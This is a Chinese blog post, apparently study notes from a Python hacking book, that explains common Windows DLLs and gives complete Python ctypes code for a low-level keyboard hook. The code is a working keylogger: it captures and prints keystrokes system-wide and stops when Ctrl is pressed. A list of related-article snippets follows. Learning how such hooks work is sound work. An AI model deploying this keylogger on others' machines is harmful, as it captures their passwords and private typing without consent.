使用ctypes模块进行消息钩取(学习笔记)

最新推荐文章于 2023-12-26 14:53:32 发布
最新推荐文章于 2023-12-26 14:53:32 发布
阅读量561 收藏 6
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43452745/article/details/106350496
版权

@《Python黑客攻防入门》

运行环境:Python 3.7
运行环境推荐使用Python2.7,因为很多的hack程序都是使用2.7版本的,贸然使用最新的版本很可能会有不兼容问题,不过这里还好。

当然,这次的代码只需要把print" "改成print,也就是把print语句的“”去掉就可以在2.7版本上运行。

不过这次的代码在有安装杀毒软件的电脑上无法正常运行,一般来说只要电脑安装了安全键盘就无法正常运行了,在windows10、windows xp上可以正常运行,当然都没有安装杀毒软件什么的。

一些基础知识:在windows中lib是静态库,DLL是动态链接库,win32API大部分以DLL库的形式存在。

一些最具代表性的DLL:
kernel32.dll:提供对文件系统、设备、进程、线程等基本资源的访问过程。
user32.dll:提供用户接口功能,包含创建、管理窗口,接收windows消息, 在屏幕上绘制文本,显示消息框。
advapi32.dll:提供注册表、系统终止与重启、windows服务启动/停止/创建、账户管理等功能。
gdi32.dll:提供对显示器、打印机及其他输出设备的管理功能。
comdlg32.dll:提供文件打开、文件保存、颜色字体选择等标准对话框管理功能。
comctl32.dll:支持应用程序访问操作系统的状态条、进度条、工具条等功能。
shell32.dll:支持应用程序访问操作系统shell提供的功能。
netapi32.dll:支持应用程序访问操作系统提供的各种通信功能。

本次代码是键盘钩取的代码,不包括鼠标活动什么的。

废话不多说,先上代码。

import sys
from ctypes import *
from ctypes.wintypes import MSG
from ctypes.wintypes import DWORD

# 使用windll
user32 = windll.user32             
kernel32 = windll.kernel32

# 变量申明,可通过微软的MSDN获取相关知识
WH_KEYBOARD_LL = 13                
WM_KEYDOWM = 0x0100
CTRL_CODE = 162

# 定义有挂钩和拆钩功能的类
class keyLogger:                   
    def __init__(self):
        self.lUser32 = user32
        self.hooked = None
    
    # 定义挂钩函数
    def installHookProc(self, pointer):
        self.hooked = self.lUser32.SetWindowsHookExA(
            WH_KEYBOARD_LL,
            pointer,
            kernel32.GetModuleHandleW(None),
            0
        )
        if not self.hooked:
            return False
        return True
    
    # 定义拆钩函数
    def uninstallHookProc(self):
        if self.hooked is None:
            return
        self.lUser32.UnhookWindowsHookEx(self.hooked)
        self.hooked = None
 
 # 定义函数指针       
def getFPTR(fn):
    CMPFUNC = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
    return CMPFUNC(fn)

# 定义钩子过程(一种回调函数)
def hookProc(nCode, wParam, lParam):
    if wParam is not WM_KEYDOWM:
        return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam, lParam)
    hookedKey = chr(lParam[0])
    print(hookedKey)
    if(CTRL_CODE == int(lParam[0])):
        print('Ctrl pressed, call uninstallHook()')
        keyLogger.uninstallHookProc()
        sys.exit(-1)
    return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam, lParam)

# 传递消息
def startKeyLog():
    msg = MSG()
    user32.GetMessageA(byref(msg),0,0,0)

#启动消息钩取    
keyLogger = keyLogger()
pointer = getFPTR(hookProc)

if keyLogger.installHookProc(pointer):
    print('installed keyLogger')
    
startKeyLog()
璃玖
关注
python调用ctypes 调用win32_在Win32上使用pythonctypes获取列表框的内容时出现问题...
weixin_39870413的博客
01-12 371
I would like to get the content of a list box thanks to python and ctypes.item_count = ctypes.windll.user32.SendMessageA(hwnd, win32con.LB_GETCOUNT, 0, 0)items = []for i in xrange(item_count):text_len...
python学习hook钩子的原理和使用
12-23
什么是钩子 之前有转一篇关于回调函数的文章 钩子函数、注册函数、回调函数,他们的概念其实是一样的。 钩子函数,顾名思义,就是把我们自己实现的hook函数在某一时刻挂接到目标挂载点上。 1. hook函数,就是我们自己实现的函数,函数类型与挂载点匹配(返回值,参数列表) 2. 挂接,也就是hook或者叫注册(register),使得hook函数对目标可用 3. 目标挂载点,也就是挂我们hook函数的地方(我们想在这个目标点实现我们自己的功能) 先看一张图:   hook的概念在windows的消息响应机制里面体现的尤为明显。可能我们大家有写过windows桌面相关的程序(像MFC
[python相关]ctypes模块
zyflying的专栏
01-06 803
1、ctypespython提供C语言接口,兼容C语言数据类型,可以访问C语言DLL或者shared lib;   2、ctypes导出cdll对象(linux和windows)、windll和oledll对象(这两个只针对windows)来访问DLL或者shared lib:       cdll-------->用cdecl 声明函数的库,如msvcrt.dll       wi
python api框架 hook_在Python中设置WindowsHookctypes,WindowsAPI)
weixin_39878646的博客
12-09 776
我正在尝试用Python(3.4.3)后台应用程序(windows7/8)全局跟踪鼠标。这涉及到设置一个WindowsHook,它应该向我返回该特定钩子的有效句柄,但是我的句柄总是0。在使用GetCursorPos只跟踪鼠标位置非常简单(作为替代方案,GetCursorInfo也可以):from ctypes.wintypes import *ppoint = ctypes.pointer(POI...
Python - ctypes模块的详细解析与使用
kygpa
07-26 2942
ctypesPython 中一个用于操作 C 数据的模块,可以用来调用 C 库函数,或者用 C 语言的数据类型来定义变量。工作中有时会使用python调用 C库的情形,而本文将详细介绍 ctypes使用方法。
x64环境下键盘消息钩取
sdalin_1993的博客
09-02 509
《逆向工程核心原理》第21章Windows消息钩取 使用书上提供的历程在x86环境下正常运行,在x64环境下直接卡死,使用VS进行编译也卡死,是因为64位下和32位下调用SetWindowsHookEx()函数略有不同,只要在生成时将平台改为x64,就可以在64位平台上正常运行。
python使用ctypes模块调用windowsapi获取系统版本示例
12-23
python使用ctypes模块调用windows api GetVersionEx获取当前系统版本,没有使用python32 复制代码 代码如下:#!c:/python27/python.exe#-*- coding:utf-8 -*- “通过调用Window API判断当前系统版本”# 演示通过...
python使用ctypes调用扩展模块的实例方法
12-20
Python 使用 `ctypes` 调用扩展模块的实例方法主要涉及到将 C 或 C++ 编写的代码编译成动态链接库(DLL on Windows, .so on Linux),然后通过 Python 的标准库 `ctypes` 来加载并调用这些库中的函数。这种方式能够...
python ctypes模块
09-16
### Python ctypes 模块详解 #### 一、ctypes 模块简介 ctypes 是一个在 Python 2.5 及以上版本自带的强大模块,它允许 Python 脚本动态加载和调用 C 库中的函数,使得 C/C++ 和 Python 之间的交互变得简单而高效。...
python-ctypes模块中文帮助文档.docx
12-05
### Python ctypes 模块知识点详解 #### 一、加载动态链接库 `ctypes`模块Python中主要用于加载和调用C语言编写的共享库(动态链接库)。无论是Windows下的`.dll`文件还是Linux下的`.so`文件,都可以通过`ctypes...
python ctypes 回调函数
u010238274的专栏
09-11 4396
定义结构体 ''' typedef struct pborca_direntry { /* Comments */ TCHAR szComments[PBORCA_MAXCOMMENT + 1]; LONG lCreateTime; /* Time o...
C#:Win32 Hooks(一)让下一个弹出子窗体自动显示在父窗体中心
爱java
05-08 282
/* ---------------------------------------------------------- 文件名称:FormHelper.cs 作者:秦建辉 MSN:splashcn@msn.com QQ:36748897 博客:http://blog.csdn.net/jhqin 开发环境: Visual Studio V2010 .NET Framew...
Python微信机器人】第六七篇: 封装32位和64位Python hook框架实战打印微信日志
最新发布
Qwertyuiop2016的博客
12-26 1329
context这个结构体获取的就是当执行到这个地址时的寄存器的值,这个和你用x32dbg看到的寄存器的值是一样的。值的类型都定义成DWORD,如果寄存器是类型是其他类型,比如字符串或结构体,你需要在Python里做相应的转换,可以参考下面Hook日志的代码。上上篇文章说的以后只更新32位版本这句话收回,以后会同时更新32位和64位的最新版本,已经可以在Python使用Detours来hook 64位版本。回调函数的参数跟被Hook函数的参数必须一样,如果参数很多,你也可以用。
利用ctypes模块实现python和c/c++交互
03-23 1146
利用pythonctypes模块可以在python中调用c/c++写的代码。 但是c/c++写的代码要编译成dll文件,在dll中导出你想在python中调用的函数或变量。 ctypes的详细用法见官方文档: http://docs.python.org/2/library/ctypes.html 这里只是个人的一个简单总结。 1. 加载Windows系统自带的dll文件:  #加载c
python——Windows API和ctypes模块和实现键盘记录
qq_40909772的博客
10-27 5410
一、关于Windows API。 Window API是微软提供的应用程序接口集合。开发应用程序时,需要通过API调用操纵系统(内核)提供的丰富功能。常用的32位Windows环境中,提供名为Win32的Windows API,开发人员可以直接调用这些Windows API。 Win32 API 最 具 代 表 的 D L L 库 分类 特征 kernel32.d...
Python Hook
少言才不会咸's Tech-blog
05-31 4474
# -*- coding: utf-8 -*- # import pythoncom import pyHook def onMouseEvent(event): # 监听鼠标事件 print "MessageName:",event.MessageName print "Message:", event.Message print "Time
python hook教程_详解Python开发中如何使用Hook技巧
weixin_36366239的博客
01-28 7856
什么是Hook,就是在一个已有的方法上加入一些钩子,使得在该方法执行前或执行后另在做一些额外的处理,那么Hook技巧有什么作用以及我们为什么需要使用它呢,事实上如果一个项目在设计架构时考虑的足够充分,模块抽象的足够合理,设计之初为以后的扩展预留了足够的接口,那么我们完全可以不需要Hook技巧。但恰恰架构人员在项目设计之初往往没办法想的足够的深远,使得后续在扩展时深圳面临重构的痛苦,这时Hook技巧...
windows简单消息勾取和dll注入
九层台
10-03 864
来源《逆向工程核心原理》 运行notepad.exe可以劫持notepad.exe的键盘输入 HookMain.cpp //HookMain.cpp #include"stdio.h" #include"conio.h" #include"windows.h" #define DEF_DLL_NAME "HookKey.dll" #define DEF_HOOKS
python ctypes模块使用
05-19
`ctypes`是Python中的一个模块,它提供了一种与C语言库进行交互的方式。使用`ctypes`模块,我们可以在Python中调用C语言编写的函数,并且可以将Python对象传递给C函数。下面是一个简单的例子: ```python import ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值